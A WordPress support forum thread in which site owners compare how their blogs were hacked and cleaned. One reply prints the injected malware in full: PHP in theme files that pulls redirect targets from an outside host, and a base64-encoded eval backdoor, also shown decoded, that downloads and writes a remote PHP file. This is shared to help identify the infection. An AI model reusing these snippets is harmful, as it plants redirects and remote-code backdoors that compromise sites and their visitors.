My blogs header has been hacked – how did they do it ?

The linked domain thing i’m not sure about. But… the way that I understand hacking works is by finding an entryway- a place where you should get a 404 page but then don’t- and then you can see the file structure in the url bar. You then navigate around the website using that as your point of reference in a way that is similar to using terminal (on mac) (so like using / to go to root, etc.) . So what I would do, is if you have google analytics, look for a page that only one person has been to, that you’ve never seen before. Navigate to that page and then see if you get a 404. if you don’t get a 404 and it says something about your server, then the mystery is solved. If you do get a 404 then i don’t know, and if you get a normal page then check your content and what it links to.

I try to answer :

1. The address they try to inject is ‘attack site’ (I run it on firefox)
https://safebrowsing.clients.google.com/safebrowsing/diagnostic?client=Firefox&hl=en-US&site=https://everlastmovie.cn/?pid=317&sid=84dd6f
2. I ever get hacked too, after recheck all file I find out that wp theme I use already insert by a backdoor which make them easily enter another code to my blog (php shell).

yup….a lot of time, you may have another php file on your server. ANYWHERE on your server. It could have been placed there months ago. It can be very hard to find if, like me, you run many sites off of your server.

I found a file called test.php, and one called wp_setup.php I think. One of those files was in a subdomain that I have my online shop setup in, it was buried about 6 levels deep in a photo folder from 2008. Another of those files was in a totally different wordpress install. But they were both used as backdoors to my main wp install only.

I found them by checking the timestamp of my header.php file, which showed me when it had been altered. I checked my server logs to find that exact time, which showed me my header.php file being altered through the above files, and showed me where they were located.

There are many ways to hack a site, but the one I listed was the most recent one I’ve dealt with……

https://www.ads-software.com/support/topic/285169?replies=9
https://www.ads-software.com/support/topic/327460?replies=6
https://www.ads-software.com/support/topic/295781?replies=2
https://www.ads-software.com/support/topic/270938?replies=4

talgalili,

your issues appear to be ongoing.

Firstly I would like to thank all of you for your kind answers.

Now from last to first:

whooami –
The issues I had there where of a different sort (to the best of my current understanding). In them I had the file “wp-header.php” altered, not “header.php”.
Also, that issue was working through a cache.php file located on another place. AND, I already (I believe) had found that leak and fixed it (deleting an added file), As I have mentioned in the threads I started there.
If you think this is a symptom to a bigger problem, and have suggestions as to how to check it, I would be glad to know.

RVoodoo –
Thank you for the answer!
I was hoping to do the exact same thing, but the hosting I use (site5) claimed that they can’t detect which file was responsible for changing this file.
Are they using a different log file for the server ?
And leads on this will be great.

alamster – thank you for your reply.

bisforbo – very interesting – thank you for that tip, I’ll see what I can do with it.

Again, my thanks for all of you for taking the time to answer.
Best,
Tal

I’m not real sure about log files…. the one I looked at, my server file is just a big long list of absolutely anything that goes through my server.

-any access, any file used, anything. So it shows POST, HEAD, GET and the file
–there’s about a million GET entries on it, but anything that uses POST I payed closer attention to. (mostly POST is just people logging into sites, but it was also how the command was sent that altered my file)

-Basically, I’m not sure what different type of log files there are, but mine showed every single action involving any file through my server…..does your host not have that type? If they do, it’ll definitely give you the information you are looking for

Hi RVoodoo,
Folloing your advice, I just checked the log files of my hosting, and couldn’t find any change to that file (including my own change to it!)

I wonder why that is.

Tal

hi,

same problem here. files affected:

/wp-content/themes/mytheme/404.php
-rwxr-x— 1 myuser nobody 409 2009-11-17 11:14 404.php

New line at the top: <script>location="<?php $code = file_get_contents("https://feed-statistics.com/domain.php?q=b8add2a5d9"); $code = str_replace("<domain>","", $code); $code = str_replace("</domain>", "", $code); echo $code; ?>?pid=317&sid=84dd6f";</script><?php get_header(); ?>

/wp-content/themes/mytheme/header.php
-rwxr-x— 1 myuser nobody 1919 2009-11-18 21:33 header.php

New line at the top: <script>location="<?php function getu($u, $p = array ()) { $c = @curl_init();if ($p) { @curl_setopt($c, CURLOPT_POST, 1); @curl_setopt($c, CURLOPT_POSTFIELDS, $p); } @curl_setopt($c, CURLOPT_URL, $u); @curl_setopt($c, CURLOPT_RETURNTRANSFER, 1); @curl_setopt($c, CURLOPT_TIMEOUT, 30); $h = @curl_exec($c); @curl_close($c); return $h; } $code = getu("https://feed-statistics.com/domain.php?q=b8add2a5d9"); $code = str_replace("<domain>", "", $code); $code = str_replace("</domain>", "", $code); echo $code; ?>?pid=317&sid=84dd6f";</script><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "https://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

found malicious code in these files:

/wp-content/plugins/wp-cache.php
-rw-r—– 1 myuser nobody 4313 2009-10-08 05:56 wp-cache.php

/wp-content/wp-manager.php
-rw-r—– 1 myuser nobody 186780 2009-10-22 21:34 wp-manager.php

/wp-content/plugins/stats/wp-stats.php

had this content:

<?php eval(base64_decode('DQppZighJF9HRVRbInAiXSkgew0KICAgIGV4aXQ7DQp9DQoNCiRob3N0ID0gc3RyX3JlcGxhY2UoInd3dy4iLCAiIiwgJF9TRVJWRVJbIkhUVFBfSE9TVCJdKTsNCiRkYXRhPWc4NzQ2MjgzNDcyMzQoImh0dHA6Ly9teXdlYi1zdGF0aXN0aWNzLmNuL2ZtYW4vY2FjaGUucGhwP25ldz0xKTsNCiRmaCA9IGZvcGVuKCIuLi8uLi9jYWNoZS5waHAiLCAidyIpOw0KZndyaXRlKCRmaCwgJGRhdGEpOw0KZmNsb3NlICgkZmgpOw0KDQpmdW5jdGlvbiBnODc0NjI4MzQ3MjM0KCR1LCAkcCA9IGFycmF5KCkpew0KICAgICRjPWN1cmxfaW5pdCgpOw0KICAgIGN1cmxfc2V0b3B0KCRjLCBDVVJMT1BUX1VSTCwgJHUpOw0KICAgIGN1cmxfc2V0b3B0KCRjLCBDVVJMT1BUX1JFVFVSTlRSQU5TRkVSLCAxKTsNCiAgICBjdXJsX3NldG9wdCgkYywgQ1VSTE9QVF9USU1FT1VULCA2MCk7DQogICAgJGg9Y3VybF9leGVjKCRjKTsNCiAgICBjdXJsX2Nsb3NlICgkYyk7DQogICAgcmV0dXJuICRoOw0KfQ0K')); ?>

which translates to:

if(!$_GET["p"]) { exit; } $host = str_replace("www.", "", $_SERVER["HTTP_HOST"]); $data=g874628347234("https://myweb-statistics.cn/fman/cache.php?new=1); $fh = fopen("../../cache.php", "w"); fwrite($fh, $data); fclose ($fh); function g874628347234($u, $p = array()){ $c=curl_init(); curl_setopt($c, CURLOPT_URL, $u); curl_setopt($c, CURLOPT_RETURNTRANSFER, 1); curl_setopt($c, CURLOPT_TIMEOUT, 60); $h=curl_exec($c); curl_close ($c); return $h; }

philipp

hi,

was the plugin exec-php installed?

philipp

… but anything that uses POST I payed closer attention to. (mostly POST is just people logging into sites, but it was also how the command was sent that altered my file)

web servers dont log _POST request variables (aka those commands). You can use my plugin if you want those.

talgalili,

I suspect but obviously cannot confirm that you are not taking care of the real problem. That you are seeing different symptoms doesnt do anything to dissuade me from that idea either.

Im guessing you are picking through the solutions in the hopes of doing things quickly, rather than properly.

I remember a thread, or so I thought it was you — where you were excited to have learned a shortcut or something for grepping files.

It might not have been you .. Im going on a very sleepy memory.

I can tell you that I have “unhacked” hundreds of wordpress blogs, and have had one instance of a reoccurrance..

And your having 4 (at a minimum) — points very strongly to either 1. you not doing a detailed enough job at making sure the site is clean or 2. you having an incredibly insecure host or 3. both

Im inclined to go with 3 – only because I also remember whois’ing your domain and noticing that it was some odd european host (or so I thought at the time).

That’s all supposition and based only on what Ive read of your other threads and remember, and of course, my own personal experience.

https://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/

https://ottodestruct.com/blog/2009/hacked-wordpress-backdoors/

whooami – I deeply thank your replies and willingness to help with advices. I respect what you wrote and will look more into seeing how to fix the security holes I have.

samboll – thanks for the pointers!

Best to the two of you ??
Tal

samboll, whooami (and others in the future)
I started doing the procedure described on:
https://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/

In order to backup my entire file system, I found the following SSH shell code to zip all my files up:
zip -r downloadme.zip *
And now I am downloading this file.
After that I will erase and then reinstall all the files for my blog.

If any one has a tip for mass uploading new plugins to the blog, that will be nice ??

Tal